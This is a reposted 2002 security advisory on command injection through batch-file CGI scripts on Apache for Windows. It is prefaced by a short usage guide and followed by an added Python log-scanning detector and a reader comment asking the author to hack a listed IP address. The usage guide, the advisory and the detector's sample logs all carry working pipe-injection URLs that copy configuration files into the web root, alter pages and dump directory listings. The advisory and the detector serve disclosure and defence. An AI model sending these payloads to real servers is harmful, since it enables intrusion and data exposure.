Remote commands can be run by using the '|' character. Apache Web Server 2.0.X ships with the file /cgi-bin/test-cgi.bat, which can be used to exploit this '|' character. But that is not all: any file with a .bat or .cmd extension can be used for this exploit.
Usage example:
1) http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf This command copies the httpd.conf file into the public wwwroot (the equivalent of c:\inetpub\wwwroot on IIS)
2) http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html This command appends the word FOOBAR to the index.html file in the public wwwroot
3) http://TARGET/cgi-bin/test-cgi.bat?|dir+c:\+>+..\htdocs\dir.txt You know what this one does :)
Note:
The '+' character denotes a space (spacebar) (the same as the %20 character on IIS)
ORIGINAL:
Vulnerability in Apache for Win32 batch file processing - Remote command execution
= Author: Ory Segal, Sanctum inc. http://www.sanctuminc.com
= Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002)
= Vendor: Apache group
= Product: Apache web server (Win32) - Running DOS batch files
Tested on:
- Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)
= Severity: High, remote command execution and arbitrary file viewing.
= CVE candidate: CAN-2002-0061 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0061)
= Summary: Because of the way Apache web server handles DOS batch scripts it is possible to execute remote commands on the web server by using the pipe ('|') character.
** IMPORTANT **
The Apache 2.0.x installation is shipped with the default script /cgi-bin/test-cgi.bat which can be exploited, but it should be noted that ANY '.bat' or '.cmd' script will allow exploitation of this vulnerability.
= Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('|') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.
Example:
1) http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf
This request will copy the httpd.conf file residing in the /conf directory of the Apache installation, into the virtual web root where it can be viewed by any user.
2) http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html
This will append the string "Foobar" to the index.html file residing in the virtual web root directory.
3) http://TARGET/cgi-bin/test-cgi.bat?|dir+c:\+>+..\htdocs\dir.txt
This will create a file containing the directory listing of the C: drive, and will put the file in the virtual web root, where any user can read it.
** Notes:
1) Url-Decoding is not provided by Apache except for the '+' character which is substituted by a space character.
2) Spilling the output into the STDOUT would most likely cause Apache to write an error message since it expects the STDOUT of a CGI script to have an HTTP response format (potential HTTP headers followed by a mandatory blank line followed by a response body). Therefore in order to view the result of a command, it is recommended that you redirect the output to a file under the web server's virtual root.
= Solution: Upgrade your Apache web server to: 1.3.24 (which should be available later today), or 2.0.34-beta (which will be published soon). Downloads are located at:
http://www.apache.org/dist/httpd/
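The following is an added detection example, not code from the advisory, from Sanctum, or from the Apache project. It scans Apache combined-format access-log lines for requests to a .bat or .cmd CGI script whose query string carries cmd.exe metacharacters (pipe, redirection, command separator), which is the pattern the description and notes above rely on. Decoding follows note 1 of the advisory ('+' becomes a space); additionally decoding %XX sequences is an assumption made here so that percent-encoded variants are also reported. The log lines, IP addresses and timestamps are constructed samples.

```python
"""
Detector for the Apache/Win32 batch-file CGI command injection pattern
(CAN-2002-0061) in access logs. Added example; not the advisory's code.
"""
import re
from typing import Optional
from urllib.parse import unquote

# Characters that cmd.exe treats as pipe, redirection or command separator.
SHELL_META = set("|><&")

# Apache combined log format: client, identity, user, [timestamp],
# "METHOD target PROTOCOL", status, size, ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Request path that names a DOS batch script.
BATCH_SCRIPT_RE = re.compile(r'\.(bat|cmd)$', re.IGNORECASE)


def decode_query(query: str) -> str:
    """'+' -> space (what Apache does) plus %XX decoding (assumption here)."""
    return unquote(query.replace("+", " "))


def classify_request(target: str) -> Optional[dict]:
    """Return a finding dict for a suspicious request target, else None.

    A target is flagged when its path is a .bat/.cmd script and the decoded
    query string contains at least one cmd.exe metacharacter.
    """
    path, _, query = target.partition("?")
    if not BATCH_SCRIPT_RE.search(path):
        return None
    decoded = decode_query(query)
    meta = sorted(c for c in SHELL_META if c in decoded)
    if not meta:
        return None
    return {"path": path, "query": decoded, "metachars": meta}


def scan_log(lines) -> list:
    """Return one finding per log line that matches the pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable combined-format line
        finding = classify_request(m.group("target"))
        if finding:
            finding["client"] = m.group("client")
            finding["status"] = int(m.group("status"))
            findings.append(finding)
    return findings


# Constructed sample lines (not real traffic). The first two carry the
# pipe/redirect pattern from the advisory (one percent-encoded); the last
# two are benign: a plain argument, and a pipe in a non-script request.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Mar/2002:10:01:02 +0000] "GET /cgi-bin/test-cgi.bat?|copy+..\\conf\\httpd.conf+..\\htdocs\\httpd.conf HTTP/1.0" 500 312',
    '10.0.0.5 - - [21/Mar/2002:10:01:09 +0000] "GET /cgi-bin/test-cgi.bat?%7Cdir+c:%5C+%3E+..%5Chtdocs%5Cdir.txt HTTP/1.0" 500 312',
    '10.0.0.7 - - [21/Mar/2002:10:02:00 +0000] "GET /cgi-bin/test-cgi.bat?hello+world HTTP/1.0" 200 77',
    '10.0.0.7 - - [21/Mar/2002:10:02:05 +0000] "GET /index.html?a=1|2 HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} -> {f['path']} metachars={f['metachars']} "
              f"query={f['query']!r} status={f['status']}")
```

Because the advisory notes that a successful command usually produces a 500 from Apache (the script output is not a valid CGI response), a status of 500 on a flagged line is consistent with the injection having run, while a 200 on an otherwise flagged line is still worth a look. Restricting the check to .bat/.cmd paths keeps the noise down; a site that maps other extensions to cmd.exe would need the path pattern widened.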
1 comment:
here, prove that you're really a hacker... because reading your writing made me dizzy... can you really do it, or is it copy-paste... please hack this... 49.0.4.221